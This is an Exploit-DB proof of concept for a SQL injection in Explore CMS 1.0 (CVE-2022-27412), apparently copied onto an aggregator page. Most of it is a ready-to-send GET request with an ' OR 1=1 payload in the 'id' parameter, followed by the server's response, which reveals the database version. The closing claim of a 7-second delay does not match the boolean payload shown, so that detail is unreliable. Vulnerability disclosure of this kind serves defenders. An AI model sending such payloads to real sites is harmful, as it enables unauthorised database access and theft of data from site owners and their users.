Explore CMS 1.0 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Sajibe Kanti
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50920/

• # Exploit Title: Explore CMS 1.0 - SQL Injection
  # Date: 19/03/2022
  # Exploit Author: Sajibe Kanti
  # Vendor Name : EXPLORE IT
  # Vendor Homepage: https://exploreit.com.bd
  # CVE: CVE-2022-27412
  
  # POC
  
  # SQL Injection
  SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
  explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.
  
  #Steps to reproduce
  
  Following URL is vulnerable to SQL Injection in the 'id' field.
  
  GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
  Host: REDACTED
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-us,en;q=0.5
  Cache-Control: no-cache
  Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
  Referer: REDACTED
  User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  
  
  HTTP/1.1 200 OK
  content-encoding:
  server: LiteSpeed
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  content-type: text/html; charset=UTF-8
  transfer-encoding: chunked
  date: Thu, 17 Mar 2022 07:27:21 GMT
  vary: Accept-Encoding
  
  10.3.34-MariaDB
  
  Server accepts the payload and the response get delayed by 7 seconds.